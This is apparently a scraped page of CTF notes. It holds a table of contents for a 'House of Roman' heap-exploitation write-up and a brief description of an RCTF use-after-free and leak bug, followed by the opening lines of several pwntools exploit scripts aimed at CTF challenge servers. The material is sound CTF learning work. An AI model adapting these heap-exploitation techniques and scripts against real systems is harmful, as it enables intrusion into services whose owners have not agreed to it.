- Disclamair
- House Of Roman
------> 2.1 Assumptions
------> 2.2 Protections
------> 2.3 Quick Walkthrough
------> 2.4 Setting the FD to malloc_hook
------> 2.5 Fixing the 0x71 freelist
------> 2.6 Unsorted Bin attack on malloc_hook
Challenge from RCTF, prequals to XCTF.
There are 2 bugs in the program : the first is an obvious UAF. The second is no NULL termination immediately after our input, allowing us to leak. NULL byte terminates at buf + size - 1, read loop breaks if buf == "\n"
However, leaking is tricky since program uses calloc, which sets the newly allocated heap chunk to 0x00.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
rol1 = lambda val, r_bits, max_bits: \ | |
(val << r_bits%max_bits) & (2**max_bits-1) | \ | |
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits))) | |
ror1 = lambda val, r_bits, max_bits: \ | |
((val & (2**max_bits-1)) >> r_bits%max_bits) | \ | |
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
elf = ELF("./libc-2.23.so") | |
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80) | |
r = remote('sapeloshop.teaser.insomnihack.ch', 80) | |
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"}) | |
raw_input() | |
i = int("3d714", 16) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
elf = ELF("./libc-2.23.so") | |
p = remote("159.203.116.12", 8888) | |
#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"}) | |
raw_input() | |
def menu(): | |
p.recvuntil(">") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
p = remote("secure_keymanager.pwn.seccon.jp",47225) | |
#p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"}) | |
raw_input() | |
def menu(): | |
p.recvuntil(">>") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
p = remote("35.198.130.245", 1337) | |
#p = process("./readme_revenge") | |
raw_input() | |
#name = "A"*920 | |
name = p64(0x00) # Pass NULL Check. | |
name += "XXXX" |